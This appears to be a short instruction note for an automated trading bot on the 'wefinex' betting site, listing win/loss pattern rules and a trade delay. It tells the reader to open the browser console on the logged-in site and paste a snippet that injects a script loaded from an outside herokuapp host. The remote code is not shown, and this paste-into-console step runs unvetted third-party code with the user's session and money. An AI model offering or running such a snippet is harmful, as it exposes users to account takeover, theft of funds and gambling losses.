
FLow rule

var listRule = [
    "x->d",
    "d->x",
    "xxx->",
    "xxxx->",
    "xdxx->",
    "ddd->",
    "dddd->",
    "dxdd->",
];

var lostValueSet = {
    0: 5
};

Open web
Goto wefinex
F12/Right Click ->Inspect
Pase here to console

---13/03
Random number from 3-9 second to trade

//check lost more > 3


var fileref=document.createElement('script')
fileref.setAttribute("type","text/javascript")
fileref.setAttribute("src", "https://tranquil-fjord-14350.herokuapp.com/version/v5-gapthep/release.js")
document.getElementsByTagName("head")[0].appendChild(fileref)
